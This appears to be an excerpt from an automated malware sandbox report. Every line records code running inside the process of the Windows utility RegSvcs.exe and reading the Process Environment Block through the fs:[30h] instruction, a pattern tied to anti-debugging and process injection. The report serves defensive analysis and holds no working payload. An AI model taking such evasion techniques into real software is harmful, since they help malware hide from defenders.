Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h] 1_2_013203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h] 1_2_013203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h] 1_2_013203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131DBE9 mov eax, dword ptr fs:[00000030h] 1_2_0131DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A23E3 mov ecx, dword ptr fs:[00000030h] 1_2_013A23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A23E3 mov ecx, dword ptr fs:[00000030h] 1_2_013A23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A23E3 mov eax, dword ptr fs:[00000030h] 1_2_013A23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013753CA mov eax, dword ptr fs:[00000030h] 1_2_013753CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013753CA mov eax, dword ptr fs:[00000030h] 1_2_013753CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h] 1_2_0131B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h] 1_2_0131B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h] 1_2_0131B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h] 1_2_0131B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h] 1_2_0131B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h] 1_2_0131B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01334A2C mov eax, dword ptr fs:[00000030h] 1_2_01334A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01334A2C mov eax, dword ptr fs:[00000030h] 1_2_01334A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01313A1C mov eax, dword ptr fs:[00000030h] 1_2_01313A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h] 1_2_013BAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h] 1_2_013BAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FAA16 mov eax, dword ptr fs:[00000030h] 1_2_012FAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FAA16 mov eax, dword ptr fs:[00000030h] 1_2_012FAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01308A0A mov eax, dword ptr fs:[00000030h] 1_2_01308A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h] 1_2_012F5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F5210 mov ecx, dword ptr fs:[00000030h] 1_2_012F5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h] 1_2_012F5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h] 1_2_012F5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133927A mov eax, dword ptr fs:[00000030h] 1_2_0133927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h] 1_2_013AB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h] 1_2_013AB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8A62 mov eax, dword ptr fs:[00000030h] 1_2_013C8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BEA55 mov eax, dword ptr fs:[00000030h] 1_2_013BEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h] 1_2_012F9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h] 1_2_012F9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h] 1_2_012F9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h] 1_2_012F9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01384257 mov eax, dword ptr fs:[00000030h] 1_2_01384257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0130AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0130AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132FAB0 mov eax, dword ptr fs:[00000030h] 1_2_0132FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h] 1_2_012F52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h] 1_2_012F52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h] 1_2_012F52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h] 1_2_012F52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h] 1_2_012F52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h] 1_2_0132D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h] 1_2_0132D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322AE4 mov eax, dword ptr fs:[00000030h] 1_2_01322AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322ACB mov eax, dword ptr fs:[00000030h] 1_2_01322ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0137A537 mov eax, dword ptr fs:[00000030h] 1_2_0137A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BE539 mov eax, dword ptr fs:[00000030h] 1_2_013BE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8D34 mov eax, dword ptr fs:[00000030h] 1_2_013C8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h] 1_2_01324D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h] 1_2_01324D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h] 1_2_01324D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FAD30 mov eax, dword ptr fs:[00000030h] 1_2_012FAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h] 1_2_0131C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h] 1_2_0131C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01317D50 mov eax, dword ptr fs:[00000030h] 1_2_01317D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01333D43 mov eax, dword ptr fs:[00000030h] 1_2_01333D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01373540 mov eax, dword ptr fs:[00000030h] 1_2_01373540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A3D40 mov eax, dword ptr fs:[00000030h] 1_2_013A3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h] 1_2_01321DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h] 1_2_01321DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h] 1_2_01321DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h] 1_2_013C05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h] 1_2_013C05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013235A1 mov eax, dword ptr fs:[00000030h] 1_2_013235A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h] 1_2_012F2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h] 1_2_012F2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h] 1_2_012F2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h] 1_2_012F2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h] 1_2_012F2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h] 1_2_0132FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h] 1_2_0132FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322581 mov eax, dword ptr fs:[00000030h] 1_2_01322581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322581 mov eax, dword ptr fs:[00000030h] 1_2_01322581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322581 mov eax, dword ptr fs:[00000030h] 1_2_01322581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322581 mov eax, dword ptr fs:[00000030h] 1_2_01322581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h] 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h] 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h] 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h] 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h] 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h] 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h] 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A8DF1 mov eax, dword ptr fs:[00000030h] 1_2_013A8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h] 1_2_0130D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h] 1_2_0130D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h] 1_2_013BFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h] 1_2_013BFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h] 1_2_013BFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h] 1_2_013BFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h] 1_2_01376DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h] 1_2_01376DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h] 1_2_01376DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376DC9 mov ecx, dword ptr fs:[00000030h] 1_2_01376DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h] 1_2_01376DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h] 1_2_01376DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132BC2C mov eax, dword ptr fs:[00000030h] 1_2_0132BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C740D mov eax, dword ptr fs:[00000030h] 1_2_013C740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C740D mov eax, dword ptr fs:[00000030h] 1_2_013C740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C740D mov eax, dword ptr fs:[00000030h] 1_2_013C740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h] 1_2_01376C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h] 1_2_01376C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h] 1_2_01376C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h] 1_2_01376C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
